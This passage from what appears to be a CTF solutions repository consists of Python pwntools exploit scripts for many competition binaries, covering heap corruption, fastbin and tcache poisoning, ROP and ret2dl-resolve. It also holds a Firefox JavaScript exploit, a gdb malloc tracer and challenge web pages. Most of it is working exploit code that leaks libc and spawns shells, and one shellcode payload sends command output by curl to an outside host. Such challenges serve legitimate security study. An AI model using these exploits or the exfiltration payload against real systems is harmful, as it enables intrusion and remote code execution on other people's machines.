24 | addr = p.recvline().strip() 25 | return int(addr, 16) 26 | 27 | def send_payload(payload): 28 | p.sendline("3") 29 | p.sendline(str(len(payload))) 30 | p.send(payload) 31 | 32 | system_addr = get_libc_func_address("system") 33 | 34 | libc_base_addr = system_addr - system_offset 35 | 36 | log.info("Calculated read_addr: " + str(hex(libc_base_addr + libc.symbols['read']))) 37 | log.info("Actual read addr: " + str(hex(get_libc_func_address("read")))) 38 | 39 | payload = "a"*8 # EBP 40 | payload += p64(libc_base_addr + pop_rdi_gadget_offset) 41 | payload += p64(libc_base_addr + bin_sh_offset) 42 | payload += p64(libc_base_addr + system_offset) 43 | 44 | send_payload(payload) 45 | 46 | p.sendline("4") 47 | 48 | p.interactive() -------------------------------------------------------------------------------- /meepwn-2018/baby-sandbox/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.terminal = ['tmux', 'split', '-h'] 4 | 5 | p = process("./baby-sandbox") 6 | 7 | prefix = asm("mov edx, eax") # Saving address of payload 8 | 9 | """ 10 | register int esp asm("esp"); 11 | if ((esp >= (0x1000000 + 0x200000)) && 12 | (esp <= (0x1000000 + 0x200100)) ) { 13 | asm("mov $1, %eax"); 14 | asm("int $0x80"); 15 | } 16 | 17 | """ 18 | cond = "\x55\x89\xe5\x89\xe0\x3d\xff\xff\x1f" + \ 19 | "\x01\x7e\x10\x89\xe0\x3d\x00\x01\x20" + \ 20 | "\x01\x7f\x07\xb8\x01\x00\x00\x00\xcd" + \ 21 | "\x80\x90\x5d" 22 | 23 | execve = asm(""" 24 | mov eax, 0xb; 25 | add edx, 0x50; 26 | mov ebx, edx; 27 | 28 | mov [esp], edx; 29 | add edx, 8; 30 | add esp, 4; 31 | mov [esp], edx; 32 | add edx, 3; 33 | add esp, 4; 34 | mov [esp], edx; 35 | add esp, 4; 36 | xor edx, edx; 37 | mov [esp], edx; 38 | sub esp, 12; 39 | 40 | mov ecx, esp; 41 | int 0x80; 42 | """ 43 | ) 44 | 45 | payload = (prefix + cond + execve).ljust(0x50, "\x00") 46 | payload += "/bin/sh\x00" 47 | payload += "-c\x00" 48 | 49 | command = "ls" 50 | 51 | payload += "curl -XPOST http://vampire.proxy.beeceptor.com --data \"$(" + \ 52 | command + \ 53 | ")\"" 54 | 55 | if len(payload) > 0x100: 56 | print("Too much") 57 | else: 58 | print(base64.b64encode(payload)) 59 | 60 | p.send(payload) 61 | 62 | p.interactive() 63 | -------------------------------------------------------------------------------- /codegate-2018/rbSql/5f0c2baaa2c0426eed9a958e3fe0ff94.php: -------------------------------------------------------------------------------- 1 | alert('{$msg}');history.go(-1);"); 4 | } 5 | ?> 6 | 7 | 8 | Krystal Fan Site krybiya.kr 9 | 10 | 11 | 12 | 13 |
14 | 18 | 25 |
 
26 | 36 |
37 | 38 | -------------------------------------------------------------------------------- /hacklu-2014/oreo/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./oreo" 7 | bin = ELF(file) 8 | libc = ELF("/lib/i386-linux-gnu/libc.so.6") 9 | 10 | conn = process(file) 11 | #gdb.attach(conn) 12 | 13 | def menu(choice): 14 | # conn.recvuntil("Exit") 15 | conn.sendline(str(choice)) 16 | 17 | def add(name, description): 18 | menu(1) 19 | #conn.recvuntil("name") 20 | conn.sendline(name) 21 | #conn.recvuntil("description") 22 | conn.sendline(description) 23 | 24 | def show(): 25 | menu(2) 26 | 27 | def order(): 28 | menu(3) 29 | 30 | def leave_msg(message): 31 | menu(4) 32 | #conn.recvuntil("submit with your order:") 33 | conn.sendline(message) 34 | 35 | def stats(): 36 | menu(5) 37 | 38 | # Leaking libc 39 | add("a"*27 + p32(bin.symbols['stdin']), "bb") 40 | show() 41 | conn.recvuntil("Description:") 42 | conn.recvuntil("Description: ") 43 | libc_leak = u32(conn.recvn(4)) 44 | libc.address = libc_leak - 0xf772e5a0 + 0xf757c000 45 | log.info(hex(libc_leak)) 46 | log.info("Libc base: " + hex(libc.address)) 47 | 48 | # Creating a fastbin at rifle_count 49 | for i in range(0x38 + 7): 50 | add("a", "b") 51 | add("a"*27 + p32(0x0804A2A8), "b") 52 | leave_msg("\x00"*0x20 + p32(0) + p32(0x41)) 53 | order() 54 | add("a", p32(bin.got['free'])) 55 | leave_msg(p32(libc.symbols['system']) + p32(libc.symbols['fgets'])) 56 | add("def", "/bin/sh") 57 | order() 58 | 59 | conn.interactive() 60 | -------------------------------------------------------------------------------- /fireshell-2019/quotes_list/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | name = "./quotes_list" 7 | bin = ELF(name) 8 | libc = ELF("./libc.so.6") 9 | 10 | conn = process(name) 11 | gdb.attach(conn) 12 | 13 | def menu(ch, idx = None): 14 | conn.recvuntil("Exit") 15 | conn.sendline(str(ch)) 16 | if idx is not None: 17 | conn.recvuntil("Index: ") 18 | conn.sendline(str(idx)) 19 | 20 | def create(l, content): 21 | menu(1) 22 | conn.recvuntil("Length:") 23 | conn.sendline(str(l)) 24 | conn.recvuntil("Content: ") 25 | conn.send(content) 26 | 27 | def edit(idx, content): 28 | menu(2, idx) 29 | conn.recvuntil("Content: ") 30 | conn.send(content) 31 | 32 | def show(idx): 33 | menu(3, idx) 34 | conn.recvuntil("Quote: ") 35 | 36 | def delete(idx): 37 | menu(4, idx) 38 | 39 | # Leaking libc 40 | create(0x3000, "a") 41 | create(0x3000, "b") 42 | delete(0) 43 | create(0x3000, "a"*8) 44 | 45 | show(0) 46 | conn.recvn(8) 47 | libc_leak = u64(conn.recvn(6) + "\x00\x00") 48 | libc.address = libc_leak - 0x7fea1a8d5ca0 + 0x7fea1a527000 49 | 50 | delete(0) 51 | delete(1) 52 | 53 | # tcache poison 54 | create(0x28, "a") # 0 55 | create(0x28, "b") # 1 56 | create(0x38, "c") # 2 57 | edit(0, "a"*0x28 + "\x51") 58 | delete(1) 59 | delete(2) 60 | create(0x48, "\x00"*8*5 + p64(0x41) + p64(libc.symbols['__free_hook'])) # 1 61 | create(0x38, "/bin/sh\x00") # 2 62 | create(0x38, p64(libc.symbols['system'])) # 3 63 | 64 | delete(2) 65 | 66 | log.info("Libc leak: " + hex(libc_leak)) 67 | 68 | conn.interactive() 69 | -------------------------------------------------------------------------------- /codegate-2018/zoo/helper.py: -------------------------------------------------------------------------------- 1 | import gdb 2 | 3 | last_size = None 4 | malloc_map = {} 5 | 6 | def ExprAsInt(expr): 7 | return int(str(gdb.parse_and_eval("(void*)(%s)" % expr)).split(" ")[0], 16) 8 | 9 | class MallocFinishBreakpoint(gdb.FinishBreakpoint): 10 | def __init__ (self): 11 | gdb.FinishBreakpoint.__init__( 12 | self, 13 | gdb.newest_frame(), 14 | internal=True, 15 | ) 16 | self.silent = True 17 | 18 | def stop(self): 19 | where = ExprAsInt('$rax') 20 | print("0x%.8x <---- malloc of 0x%x bytes" % (where, last_size)) 21 | 22 | if where in malloc_map: 23 | print("[!] where already in malloc map") 24 | malloc_map[where] = last_size 25 | 26 | return False 27 | 28 | class MallocBreakpoint(gdb.Breakpoint): 29 | def __init__(self): 30 | gdb.Breakpoint.__init__(self, 'malloc', internal=True) 31 | self.silent = True 32 | 33 | def stop(self): 34 | global last_size 35 | last_size = ExprAsInt('$rdi') 36 | MallocFinishBreakpoint() 37 | 38 | return False 39 | 40 | class FreeBreakpoint(gdb.Breakpoint): 41 | def __init__ (self): 42 | gdb.Breakpoint.__init__(self, 'free', internal=True) 43 | self.silent = True 44 | 45 | def stop(self): 46 | where = ExprAsInt('$rdi') 47 | if where in malloc_map: 48 | print("0x%.8x <---- free of 0x%x bytes" % (where, malloc_map[where])) 49 | del malloc_map[where] 50 | else: 51 | print("0x%.8x <---- free (not in malloc map?!)" % where) 52 | 53 | MallocBreakpoint() 54 | FreeBreakpoint() 55 | -------------------------------------------------------------------------------- /codegate-2019/god-the-reum/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | name = "./god-the-reum" 7 | bin = ELF(name) 8 | #libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | libc = ELF("./libc-2.27.so") 10 | 11 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc-2.27.so")} 12 | 13 | conn = process(name, env=env) 14 | #gdb.attach(conn) 15 | 16 | def menu(ch, idx = None): 17 | conn.recvuntil("select your choice : ") 18 | conn.sendline(str(ch)) 19 | if idx is not None: 20 | conn.recvuntil("input wallet no :") 21 | conn.sendline(str(idx)) 22 | 23 | def create(size): 24 | menu(1) 25 | conn.recvuntil("how much initial eth") 26 | conn.sendline(str(size)) 27 | conn.recvuntil("Creating new wallet") 28 | 29 | def deposit(idx, money): 30 | menu(2, idx) 31 | conn.recvuntil("how much deposit") 32 | conn.sendline(str(money)) 33 | 34 | def withdraw(idx, money): 35 | menu(3, idx) 36 | conn.recvuntil("how much") 37 | conn.sendline(str(money)) 38 | 39 | def show(): 40 | menu(4) 41 | 42 | def hid(idx, contents): 43 | menu(6, idx) 44 | conn.recvuntil("new eth :") 45 | conn.send(contents) 46 | 47 | # Leaking libc 48 | create(0x3000) # 0 49 | create(0x30) # 1 50 | withdraw(0, 0x3000) 51 | show() 52 | conn.recvuntil("0) addr") 53 | conn.recvuntil("ballance ") 54 | libc_leak = int(conn.recvline()[:-1]) 55 | libc.address = libc_leak - 0x7f072a20bca0 + 0x7f0729e20000 56 | 57 | withdraw(1, 0x30) 58 | hid(1, p64(libc.symbols['__free_hook']) + "\n") 59 | 60 | create(0x30) # 2 61 | create(0x30) # 3 62 | hid(3, p64(libc.address + 0x4f322) + "\n") 63 | #create(0x30) # 4 64 | withdraw(2, 0x30) 65 | 66 | log.info("Libc leak: " + hex(libc_leak)) 67 | 68 | conn.interactive() 69 | -------------------------------------------------------------------------------- /rctf-2018/stringer/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./stringer" 7 | bin = ELF(file) 8 | #libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | libc = ELF("./libc.so.6") 10 | 11 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc.so.6")} 12 | 13 | #conn = process(file, env=env) 14 | conn = remote("stringer.2018.teamrois.cn", 7272) 15 | #gdb.attach(conn) 16 | 17 | def menu(ch): 18 | conn.recvuntil("choice:") 19 | conn.sendline(str(ch)) 20 | 21 | def new(size, content, shell=False): 22 | menu(1) 23 | conn.recvuntil("string length:") 24 | conn.sendline(str(size)) 25 | if shell: 26 | return 27 | conn.recvuntil("string content") 28 | conn.send(content) 29 | conn.recvuntil("your string: ") 30 | 31 | def edit(idx, idx2): 32 | menu(3) 33 | conn.recvuntil("the index:") 34 | conn.sendline(str(idx)) 35 | conn.recvuntil("byte index") 36 | conn.sendline(str(idx2)) 37 | 38 | def delete(idx): 39 | menu(4) 40 | conn.recvuntil("the index:") 41 | conn.sendline(str(idx)) 42 | 43 | # Libc leak 44 | new(0x98, "a\n") # 0 45 | new(0x98, "a\n") # 1 46 | new(0x98, "a\n") # 2 47 | delete(1) 48 | # Making freed chunk MMAPPED 49 | edit(0, 0x98) 50 | edit(0, 0x98) 51 | new(0x98, "a"*7 + "\n") # 3 52 | conn.recvuntil("a"*7 + "\n") 53 | 54 | libc_leak = u64(conn.recvn(6) + "\x00\x00") 55 | 56 | #libc.address = libc_leak - 0x7f91d76deb78 + 0x7f91d731a000 57 | libc.address = libc_leak - 0x7fd3eb190b78 + 0x7fd3eadcc000 58 | log.info("Libc leak: " + hex(libc_leak)) 59 | 60 | # Fastbin corruption 61 | new(0x60, "a\n") # 4 62 | new(0x60, "a\n") # 5 63 | delete(4) 64 | delete(5) 65 | delete(4) 66 | new(0x60, p64(libc.symbols['__malloc_hook'] - 0x23) + "\n") # 6 67 | new(0x60, "a\n") # 7 68 | new(0x60, "a\n") # 8 69 | new(0x60, "\x00"*0x13 + p64(libc.address + 0xf02a4) + "\n") 70 | 71 | new(0x10, "a", shell=True) 72 | 73 | conn.interactive() 74 | -------------------------------------------------------------------------------- /insomni-hack-18/sapeloshop/order.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | Jackie Stewart's Sapeurs Shop 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 |
21 |
22 |
23 | Home 24 | My Cart 25 | 26 |
27 |
28 |
29 | 30 |
31 | 32 |
33 |
34 |

The sapelogie prophet

35 | 36 |

Jackie Stewart

37 |

Real sapeurs know were to shop! You can buy everything here to look just like me!

38 |
39 |
40 | 41 |
42 | 43 | 44 |
Thank you for your order!!!
45 | 46 |
47 | 48 |
49 | 50 |
51 |
52 |

©Jackie Stewart. Gabao RPZ à point 0.

53 |
54 |
55 | 56 | 57 | -------------------------------------------------------------------------------- /blaze-ctf-2018/blazefox/exploit.js: -------------------------------------------------------------------------------- 1 | var jsp = new JSPack(); 2 | 3 | function lower(d) { 4 | return jsp.Unpack(">L>L", jsp.Pack("d", [d]))[1]; 5 | } 6 | 7 | function upper(d) { 8 | return jsp.Unpack(">L>L", jsp.Pack("d", [d]))[0]; 9 | } 10 | 11 | function double_to_ulong(d) { 12 | return upper(d)*0x100000000 + lower(d); 13 | } 14 | 15 | function ulong_to_double(n) { 16 | l = jsp.Pack(">L", [n%0x100000000]); 17 | u = jsp.Pack(">L", [n/0x100000000]); 18 | return jsp.Unpack("d", u.concat(l))[0]; 19 | } 20 | 21 | var leak_arr = new Array(2); 22 | 23 | // Markers to help us find array 24 | leak_arr[0] = 0x41424241; 25 | leak_arr[1] = 0x42434342; 26 | 27 | leak_arr.blaze(); 28 | 29 | alert("Leaking libxul"); 30 | var libxul_leak = double_to_ulong(leak_arr[5]); 31 | 32 | alert(libxul_leak.toString(16)); 33 | 34 | var arr = new Array(2); 35 | var typed_arr = new Uint32Array(0x10); 36 | 37 | arr[0] = 0x43444443; 38 | arr[1] = 0x44454544; 39 | typed_arr[0] = 0x45464645; 40 | typed_arr[1] = 0x46474746; 41 | 42 | arr.blaze(); 43 | 44 | function a_write(addr, value) { 45 | arr[9] = ulong_to_double(addr); 46 | typed_arr[0] = value % 0x100000000; 47 | typed_arr[1] = value / 0x100000000; 48 | } 49 | 50 | function a_read(addr) { 51 | arr[9] = ulong_to_double(addr); 52 | return typed_arr[0] + typed_arr[1]*0x100000000; 53 | } 54 | 55 | var libxul_base = libxul_leak - 0x7f8ab37a9fc0 + 0x7f8aac2d8000; 56 | var memmove_got = libxul_base + 0x88d24b0; 57 | 58 | var memmove_addr = a_read(memmove_got); 59 | 60 | alert("Memmove addr: " + memmove_addr.toString(16)); 61 | 62 | var libc_base = memmove_addr - 0x14d9b0; 63 | var system_addr = libc_base + 0x45390; 64 | 65 | var cmd = "/usr/bin/gnome-calculator &"; 66 | var target = new Uint8Array(200); 67 | 68 | for (var i = 0;ist_value = got of read 60 | symtab = p64(0) + \ 61 | p64(bin.got['read'] - 8) 62 | 63 | reloc = p64(0) + \ 64 | p64(RELOC_ADDR + 0x10) + \ 65 | p64(RELOC_ADDR + 0x100 - offset_system_from_read) + \ 66 | p64(7) 67 | 68 | a_write(OVERWRITE_ADDRESS, p64(LINKMAP_ADDR)) 69 | a_write(LINKMAP_ADDR, linkmap[:0x90]) 70 | a_write(LINKMAP_ADDR + 0x90, linkmap[0x90:]) 71 | a_write(SYMTAB_ADDR, symtab) 72 | a_write(RELOC_ADDR, reloc) 73 | pause() 74 | 75 | # Freeing 76 | delete(2) 77 | 78 | conn.interactive() 79 | -------------------------------------------------------------------------------- /0ctf-quals-2017/babyheap/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./babyheap" 7 | 8 | bin = ELF(file) 9 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 10 | 11 | conn = process(file) 12 | #gdb.attach(conn) 13 | 14 | def a(size, shell=True): 15 | conn.recvuntil("Command: ") 16 | conn.sendline("1") 17 | conn.recvuntil("Size: ") 18 | conn.sendline(str(size)) 19 | if shell: 20 | return 21 | conn.recvuntil("Allocate Index") 22 | 23 | def fill(index, content, size = None): 24 | conn.recvuntil("Command: ") 25 | conn.sendline("2") 26 | conn.recvuntil("Index: ") 27 | conn.sendline(str(index)) 28 | conn.recvuntil("Size: ") 29 | if size is None: 30 | conn.sendline(str(len(content))) 31 | else: 32 | conn.sendline(str(size)) 33 | conn.recvuntil("Content: ") 34 | conn.send(content) 35 | 36 | def f(index): 37 | conn.recvuntil("Command: ") 38 | conn.sendline("3") 39 | conn.recvuntil("Index: ") 40 | conn.sendline(str(index)) 41 | 42 | def d(index): 43 | conn.recvuntil("Command: ") 44 | conn.sendline("4") 45 | conn.recvuntil("Index: ") 46 | conn.sendline(str(index)) 47 | conn.recvuntil("Content: \n") 48 | 49 | # House of Einherjar - getting libc leak 50 | 51 | a(0x100) # 0 52 | a(0x100) # 1 53 | a(0x100) # 2 54 | 55 | a(0x100) # 3 56 | 57 | f(0) 58 | 59 | payload = "\x00"*0x100 + p64(0x220) + p64(0x110) 60 | fill(1, payload) 61 | f(2) 62 | 63 | a(0x100) # 0 64 | a(0x100) # 2 65 | f(2) 66 | d(1) 67 | 68 | libc_leak = u64(conn.recvn(8)) 69 | libc.address = libc_leak - 0x7f56d1f6ab78+ 0x7f56d1ba6000 70 | 71 | # Clean the heap 72 | f(0) 73 | f(3) 74 | # Now, only 1 chunk is reserved 75 | 76 | # Fastbin corruption 77 | a(0x60) # 0 78 | a(0x60) # 2 79 | f(2) 80 | 81 | payload = "\x00"*0x68 + p64(0x71) + p64(libc.symbols['__malloc_hook'] - 0x23) 82 | fill(0, payload) 83 | a(0x60) # 2 84 | a(0x60) # 3 85 | 86 | payload = "\x00"*0x13 + p64(libc.address + 0x4526a) # one_gadget 87 | fill(3, payload) 88 | 89 | a(0x60, shell=True) 90 | 91 | log.info("Libc leak: " + hex(libc_leak)) 92 | 93 | conn.interactive() 94 | -------------------------------------------------------------------------------- /hitcon-2015/blinkroot/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.arch = "amd64" 4 | 5 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 6 | bin = ELF("./blinkroot") 7 | 8 | offset_system = libc.symbols['system'] 9 | offset_read = libc.symbols['read'] 10 | offset_system -= offset_read; # Offset of system from read 11 | 12 | DATA_ADDR = bin.symbols["data"] 13 | LOAD_ADDRESS = offset_system 14 | LINKMAP_ADDR = DATA_ADDR + 0x10 15 | STRTAB_OFFSET = 0x180 16 | STRTAB_ADDR = LINKMAP_ADDR + STRTAB_OFFSET 17 | SYMTAB_OFFSET = 0x100 18 | SYMTAB_ADDR = LINKMAP_ADDR + SYMTAB_OFFSET 19 | RELOC_OFFSET = 0x140 20 | RELOC_ADDR = LINKMAP_ADDR + RELOC_OFFSET 21 | 22 | PUTS_RELOC_INDEX = 1 23 | 24 | OVERWRITE_ADDRESS = 0x600B48 # Where link_map ptr is stored in GOT 25 | OVERWRITE_VALUE = LINKMAP_ADDR # The prev 8 bytes will be 0x10 26 | PAYLOAD_LEN = 0x400 27 | 28 | COMMAND = "; touch pwned" 29 | 30 | conn = process("./blinkroot") 31 | #gdb.attach(conn) 32 | 33 | ## Internal structures 34 | 35 | linkmap = "" 36 | linkmap += p64(LOAD_ADDRESS, sign='signed') 37 | linkmap += COMMAND.ljust(0x60, "\x00") 38 | linkmap += p64(STRTAB_ADDR) # Some valid address so that d_ptr can be retrieved 39 | linkmap += p64(SYMTAB_ADDR) 40 | linkmap += p64(0)*16 41 | linkmap += p64(RELOC_ADDR) 42 | linkmap = linkmap.ljust(SYMTAB_OFFSET, "\x00") 43 | 44 | symtab = "" 45 | symtab += p64(0) # Tag 46 | symtab += p64(bin.got['read'] - 8) # So sym->st_value points to 'read' in GOT 47 | symtab += p64(0) 48 | symtab = symtab.ljust(RELOC_OFFSET - SYMTAB_OFFSET, "\x00") 49 | 50 | reloc = "" 51 | reloc += p64(0) # Tag 52 | reloc += p64(RELOC_ADDR + 0x10 - PUTS_RELOC_INDEX *0x18) # PTR to relocation table 53 | # Relocation entry 54 | reloc += p64(bin.symbols['data'] - offset_system) # Some random address with write access 55 | reloc += p64(7) # type = JMP_REL and symbol table index = 0, points to first entry in our crafted symbol table, i.e. read 56 | # Padding 57 | reloc = reloc.ljust(STRTAB_OFFSET - RELOC_OFFSET, "\x00") 58 | 59 | payload = p64(OVERWRITE_ADDRESS - DATA_ADDR - 0x8, sign="signed") 60 | payload += p64(OVERWRITE_VALUE) 61 | payload += linkmap + symtab + reloc 62 | payload = payload.ljust(PAYLOAD_LEN, '\x00') 63 | 64 | conn.sendline(payload) 65 | conn.interactive() 66 | -------------------------------------------------------------------------------- /hacklu-2017/heapheaven/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level = 'debug' 4 | 5 | file = "./HeapHeaven" 6 | 7 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 8 | bin = ELF(file) 9 | 10 | conn = process(file) 11 | #conn = gdb.debug(file) 12 | 13 | def get_num(n): 14 | s = "" 15 | while n != 0: 16 | if n % 2 != 0: 17 | s = "wi" + s 18 | n = (n-1)/2 19 | else: 20 | s = "wa" + s 21 | n /= 2 22 | s = s.ljust(128, "\x00") 23 | return s 24 | 25 | def malloc(size): 26 | conn.recvuntil("NOM-NOM\n") 27 | conn.sendline("whaa!") 28 | conn.recvuntil("ing...\n"); 29 | conn.sendline(get_num(size)) 30 | 31 | def display(offset): 32 | conn.recvuntil("NOM-NOM\n") 33 | conn.sendline("mommy?") 34 | conn.sendline(get_num(offset)) 35 | conn.recvuntil(": ") 36 | return conn.recvline()[:-1] 37 | 38 | def spill(offset, str): 39 | conn.recvuntil("NOM-NOM\n") 40 | conn.sendline("") 41 | conn.recvuntil("doing?\n") 42 | conn.sendline(get_num(offset)) 43 | conn.recvuntil("ing!\n") 44 | conn.sendline(str) 45 | 46 | def free(offset): 47 | conn.recvuntil("NOM-NOM\n") 48 | conn.sendline("NOM-NOM") 49 | conn.sendline(get_num(offset)) 50 | 51 | # Leaking libc address for base of unsorted bin 52 | # Initially: 0 53 | malloc(0x10) # 0 16 54 | malloc(400) # 0 16 400 55 | malloc(0x10) # 0 16 400 16 56 | free(0x40) # 0 16 [400] 16 57 | malloc(400) # 0 16 400 16 58 | 59 | usort_addr = u64(display(0x40)[0:6] + "\x00\x00") 60 | system_addr = 0x7f51f26fe390 - 0x007f51f2a7db78 + usort_addr 61 | free_hook_addr = system_addr - libc.symbols['system'] \ 62 | + libc.symbols['__free_hook'] 63 | 64 | # Let's leak heap's address, free the fastbins and see fd pointer 65 | free(0x20) # 0 [16] 400 16 66 | free(0x1e0) # 0 [16] 400 [16] 67 | 68 | str = display(0x1e0)[0:6] 69 | log.info(str.encode('hex')) 70 | 71 | log.info(len(str)) 72 | happ_addr = u64(str + "\x00\x00") - 0x10 73 | 74 | log.info("Heap_addr: " + p64(happ_addr)[::-1].encode('hex')) 75 | 76 | offset_free_hook = free_hook_addr - happ_addr 77 | 78 | spill(0, "/bin/sh") 79 | spill(offset_free_hook, p64(system_addr)) 80 | free(0) 81 | 82 | conn.interactive() 83 | 84 | -------------------------------------------------------------------------------- /insomni-hack-18/sapeloshop/header.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | Jackie Stewart's Sapeurs Shop 10 | 11 | 12 | 13 | 14 | 15 | 16 | 30 | 31 | 32 | 33 | 34 |
35 |
36 |
37 | Home 38 | My Cart 39 | 40 |
41 |
42 |
43 | 44 |
45 | 46 |
47 |
48 |

The sapelogie prophet

49 | 50 |

Jackie Stewart

51 |

Real sapeurs know were to shop! You can buy everything here to look just like me!

52 |
53 |
54 | 55 |
56 | 57 | 58 | 59 | -------------------------------------------------------------------------------- /n1ctf-2018/vote/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | 4 | context.log_level = "debug" 5 | context.terminal = ['tmux', 'splitw', '-h'] 6 | 7 | bin = ELF('./vote') 8 | libc = ELF('./libc-2.23.so') 9 | #libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 10 | 11 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc-2.23.so")} 12 | 13 | #conn = process('./vote', env=env) 14 | #gdb.attach(conn) 15 | 16 | conn = remote("47.97.190.1", 6000) 17 | 18 | def menu(choice): 19 | conn.recvuntil("Action: ") 20 | conn.sendline(str(choice)) 21 | 22 | def create(size, name, shell=False): 23 | menu(0) 24 | conn.recvuntil("size: "); 25 | conn.sendline(str(size)); 26 | if shell: 27 | return 28 | conn.recvuntil("name: ") 29 | conn.send(name) 30 | 31 | def show(index): 32 | menu(1) 33 | conn.recvuntil("index: ") 34 | conn.sendline(str(index)) 35 | 36 | def vote(index): 37 | menu(2) 38 | conn.recvuntil("index: "); 39 | conn.sendline(str(index)) 40 | 41 | def result(): 42 | menu(3) 43 | 44 | def cancel(index): 45 | menu(4) 46 | conn.recvuntil("index: ") 47 | conn.sendline(str(index)) 48 | 49 | def exit(): 50 | menu(5) 51 | 52 | msize = 0x7f 53 | 54 | create(msize, "a\n") # 0 55 | create(msize, "b\n") # 1 56 | 57 | cancel(0) 58 | 59 | show(0) 60 | conn.recvuntil("count: ") 61 | libc_leak = int(conn.recvline().strip()) 62 | #libc.address = libc_leak - 0x7f98fa34db78 + 0x7f98f9f89000 63 | libc.address = libc_leak - 0x7f4a8c9dab78 + 0x7f4a8c616000 64 | 65 | log.info("Libc leak: " + hex(libc_leak)) 66 | 67 | # Fastbin corruption 68 | payload = p64(0) + \ 69 | p64(0x70) + \ 70 | p64(libc.symbols['__malloc_hook'] - 0x23) + \ 71 | "\n" 72 | create(0x60 - 0x10, payload) # 2 73 | create(0x60 - 0x10, "b\n") # 3 74 | 75 | cancel(2) 76 | cancel(3) 77 | log.info(hex(libc.symbols['__malloc_hook'] - 0x23)) 78 | 79 | for i in range(0x10 + 0x10): 80 | vote(3) 81 | 82 | create(0x60 - 0x10, "a\n") # 4 83 | create(0x60 - 0x10, "b\n") # 5 84 | 85 | one_gadget = libc.address + 0xf0274 86 | payload = "\x00"*(0x23 - 0x10 - 0x10) + p64(one_gadget) + "\n" 87 | 88 | create(0x60 - 0x10, payload) 89 | 90 | create(0x10, "a\n", shell=True) # 6 91 | 92 | conn.sendline("ls; cat flag") 93 | 94 | conn.interactive() 95 | -------------------------------------------------------------------------------- /rctf-2017/rnote2/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./RNote2" 7 | bin = ELF(file) 8 | #libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | libc = ELF("./libc.so.6") 10 | 11 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc.so.6")} 12 | 13 | conn = process(file, env=env) 14 | #gdb.attach(conn) 15 | 16 | def menu(ch): 17 | conn.recvuntil("choice:") 18 | conn.sendline(str(ch)) 19 | 20 | def add(size, content): 21 | menu(1) 22 | conn.recvuntil("length:") 23 | conn.sendline(str(size)) 24 | conn.recvuntil("note content:") 25 | conn.send(content) 26 | 27 | def delete(idx): 28 | menu(2) 29 | conn.recvuntil("delete?") 30 | conn.sendline(str(idx)) 31 | 32 | def list(): 33 | menu(3) 34 | 35 | def edit(idx, content): 36 | menu(4) 37 | conn.recvuntil("edit?") 38 | conn.sendline(str(idx)) 39 | conn.recvuntil("new content") 40 | conn.send(content) 41 | conn.recvuntil("Done") 42 | 43 | def expand(idx, expand_size, expand_content): 44 | menu(5) 45 | conn.recvuntil("expand?") 46 | conn.sendline(str(idx)) 47 | conn.recvuntil("expand?") 48 | conn.sendline(str(expand_size)) 49 | conn.recvuntil("want to expand") 50 | conn.send(expand_content) 51 | conn.recvuntil("Done") 52 | 53 | test_content = "a"*7 + "\n" 54 | 55 | # Libc leak 56 | add(0x100, test_content) 57 | add(0x100, "/bin/sh\x00\n") 58 | delete(1) 59 | add(0x100, test_content) 60 | list() 61 | conn.recvuntil(test_content) 62 | libc_leak = u64(conn.recvn(6) + "\x00\x00") 63 | #libc.address = libc_leak - 0x7f4a4f3a7b78 + 0x7f4a4efe3000 64 | libc.address = libc_leak - 0x7f4743e31b78 + 0x7f4743a6e000 65 | log.info("Libc leak: " + hex(libc_leak)) 66 | 67 | add(0x38, "a"*0x37 + "\n") # 3 68 | add(0x100, "b"*0xf9 + "\n") # 4 69 | 70 | fake_note = p64(0) + \ 71 | p64(0x20) + \ 72 | p64(0) + \ 73 | p64(0) + \ 74 | p64(libc.symbols['__free_hook']) 75 | 76 | add(0x100, "f"*0x90 + fake_note + "\n") # 5 77 | add(0x100, test_content) # 6 78 | delete(4) # b's inserted in freelist 79 | 80 | fake_note = "d"*8 + \ 81 | "e"*7 82 | expand(3, 0x100 - 0x38, "c"*0x16 + fake_note + "\n") 83 | edit(5, p64(libc.symbols['system']) + "\n") 84 | 85 | delete(1) 86 | 87 | conn.interactive() 88 | -------------------------------------------------------------------------------- /acebear-2018/memo_heap/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 